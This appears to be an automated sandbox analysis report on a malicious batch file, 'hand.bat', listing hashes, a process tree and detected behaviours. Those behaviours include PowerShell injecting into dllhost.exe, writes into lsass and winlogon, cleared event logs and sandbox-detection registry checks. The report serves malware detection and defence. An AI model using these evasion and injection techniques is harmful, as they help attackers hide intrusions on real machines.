Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-11-2024 21:24
Static task
static1
Behavioral task
behavioral1
Sample
hand.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
hand.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
hand.bat
Resource
win11-20241007-en
General
-
Target
hand.bat
-
Size
7.0MB
-
MD5
1a013c7ac90b58073895b26cae70def7
-
SHA1
60c9c3294fc7ac3d336a478274f62f4818498230
-
SHA256
698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
-
SHA512
c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
-
SSDEEP
49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4800 created 640 4800 powershell.exe 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4800 powershell.exe 3504 powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 8 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx svchost.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4800 set thread context of 5008 4800 powershell.exe 83 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe -
Checks SCSI registry key(s) 3 TTPs 16 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "186" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 19 Nov 2024 21:26:16 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={64BB3CD5-F298-4409-BD20-168FD84FF663}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession winlogon.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile winlogon.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0" winlogon.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732051575" OfficeClickToRun.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 3504 powershell.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 5008 dllhost.exe 3504 powershell.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 3472 Process not Found 1236 Process not Found 1700 Process not Found 1100 Process not Found 4956 Process not Found 1332 Process not Found 1408 Process not Found 3608 Process not Found 4268 Process not Found 2996 Process not Found 4448 Process not Found 1084 Process not Found 1240 Process not Found 3616 Process not Found 1236 Process not Found 580 Process not Found 652 Process not Found 2872 Process not Found 424 Process not Found 504 Process not Found 432 Process not Found 1700 Process not Found 3040 Process not Found 1880 Process not Found 840 Process not Found 5096 Process not Found 2172 Process not Found 860 Process not Found 1796 Process not Found 416 Process not Found 224 Process not Found 564 Process not Found 3184 Process not Found 788 Process not Found 3432 Process not Found 4968 Process not Found 1444 Process not Found 3608 Process not Found 4268 Process not Found 2996 Process not Found 3632 Process not Found 3368 Process not Found 3724 Process not Found 4924 Process not Found 3692 Process not Found 3800 Process not Found 1076 Process not Found 1380 Process not Found 904 Process not Found 5040 Process not Found 2828 Process not Found 1400 Process not Found 4448 Process not Found 4124 Process not Found 2932 Process not Found 3068 Process not Found 1844 Process not Found 4708 Process not Found 2792 Process not Found 1240 Process not Found 4128 Process not Found 3192 Process not Found 980 Process not Found 3868 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 5008 dllhost.exe Token: SeCreateGlobalPrivilege 3296 dwm.exe Token: SeChangeNotifyPrivilege 3296 dwm.exe Token: 33 3296 dwm.exe Token: SeIncBasePriorityPrivilege 3296 dwm.exe Token: SeCreateGlobalPrivilege 3176 dwm.exe Token: SeChangeNotifyPrivilege 3176 dwm.exe Token: 33 3176 dwm.exe Token: SeIncBasePriorityPrivilege 3176 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeCreateGlobalPrivilege 3440 dwm.exe Token: SeChangeNotifyPrivilege 3440 dwm.exe Token: 33 3440 dwm.exe Token: SeIncBasePriorityPrivilege 3440 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeCreateGlobalPrivilege 2904 dwm.exe Token: SeChangeNotifyPrivilege 2904 dwm.exe Token: 33 2904 dwm.exe Token: SeIncBasePriorityPrivilege 2904 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeCreateGlobalPrivilege 3152 dwm.exe Token: SeChangeNotifyPrivilege 3152 dwm.exe Token: 33 3152 dwm.exe Token: SeIncBasePriorityPrivilege 3152 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeDebugPrivilege 3504 powershell.exe Token: SeCreateGlobalPrivilege 4064 dwm.exe Token: SeChangeNotifyPrivilege 4064 dwm.exe Token: 33 4064 dwm.exe Token: SeIncBasePriorityPrivilege 4064 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeCreateGlobalPrivilege 380 dwm.exe Token: SeChangeNotifyPrivilege 380 dwm.exe Token: 33 380 dwm.exe Token: SeIncBasePriorityPrivilege 380 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeCreateGlobalPrivilege 4232 dwm.exe Token: SeChangeNotifyPrivilege 4232 dwm.exe Token: 33 4232 dwm.exe Token: SeIncBasePriorityPrivilege 4232 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeAuditPrivilege 2588 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3372 Explorer.EXE 3372 Explorer.EXE -
Suspicious use of SendNotifyMessage 30 IoCs
pid Process 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE 3372 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5060 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3120 wrote to memory of 4308 3120 cmd.exe 81 PID 3120 wrote to memory of 4308 3120 cmd.exe 81 PID 3120 wrote to memory of 4800 3120 cmd.exe 82 PID 3120 wrote to memory of 4800 3120 cmd.exe 82 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 4800 wrote to memory of 5008 4800 powershell.exe 83 PID 5008 wrote to memory of 640 5008 dllhost.exe 5 PID 5008 wrote to memory of 696 5008 dllhost.exe 7 PID 5008 wrote to memory of 996 5008 dllhost.exe 12 PID 5008 wrote to memory of 548 5008 dllhost.exe 13 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 5008 wrote to memory of 772 5008 dllhost.exe 14 PID 5008 wrote to memory of 724 5008 dllhost.exe 15 PID 5008 wrote to memory of 1064 5008 dllhost.exe 16 PID 5008 wrote to memory of 1088 5008 dllhost.exe 17 PID 5008 wrote to memory of 1128 5008 dllhost.exe 18 PID 5008 wrote to memory of 1152 5008 dllhost.exe 19 PID 5008 wrote to memory of 1248 5008 dllhost.exe 21 PID 5008 wrote to memory of 1288 5008 dllhost.exe 22 PID 5008 wrote to memory of 1356 5008 dllhost.exe 23 PID 4800 wrote to memory of 4724 4800 powershell.exe 87 PID 4800 wrote to memory of 4724 4800 powershell.exe 87 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 5008 wrote to memory of 1492 5008 dllhost.exe 24 PID 5008 wrote to memory of 1508 5008 dllhost.exe 25 PID 5008 wrote to memory of 1592 5008 dllhost.exe 26 PID 5008 wrote to memory of 1608 5008 dllhost.exe 27 PID 5008 wrote to memory of 1716 5008 dllhost.exe 28 PID 5008 wrote to memory of 1724 5008 dllhost.exe 29 PID 5008 wrote to memory of 1776 5008 dllhost.exe 30 PID 5008 wrote to memory of 1872 5008 dllhost.exe 31 PID 5008 wrote to memory of 1884 5008 dllhost.exe 32 PID 5008 wrote to memory of 1952 5008 dllhost.exe 33 PID 5008 wrote to memory of 1968 5008 dllhost.exe 34 PID 5008 wrote to memory of 1052 5008 dllhost.exe 35 PID 5008 wrote to memory of 1172 5008 dllhost.exe 36 PID 5008 wrote to memory of 2104 5008 dllhost.exe 37 PID 640 wrote to memory of 3296 640 winlogon.exe 89 PID 640 wrote to memory of 3296 640 winlogon.exe 89 PID 5008 wrote to memory of 3296 5008 dllhost.exe 89 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 5008 wrote to memory of 2212 5008 dllhost.exe 39 PID 5008 wrote to memory of 2432 5008 dllhost.exe 40 PID 5008 wrote to memory of 2440 5008 dllhost.exe 41 PID 5008 wrote to memory of 2480 5008 dllhost.exe 42 PID 5008 wrote to memory of 2532 5008 dllhost.exe 43 PID 5008 wrote to memory of 2576 5008 dllhost.exe 44 PID 4800 wrote to memory of 2380 4800 powershell.exe 90 PID 4800 wrote to memory of 2380 4800 powershell.exe 90 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 696 wrote to memory of 2576 696 lsass.exe 44 PID 5008 wrote to memory of 2588 5008 dllhost.exe 45 PID 5008 wrote to memory of 2616 5008 dllhost.exe 46 PID 640 wrote to memory of 3176 640 winlogon.exe 226 PID 640 wrote to memory of 3176 640 winlogon.exe 226
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:548
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c1906579-d414-40e0-be3d-afde0745f167}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3296
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a1d855 /state1:0x41c64e6d2⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5060
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1356
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2564
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1884
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004C82⤵PID:5076
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1052
-
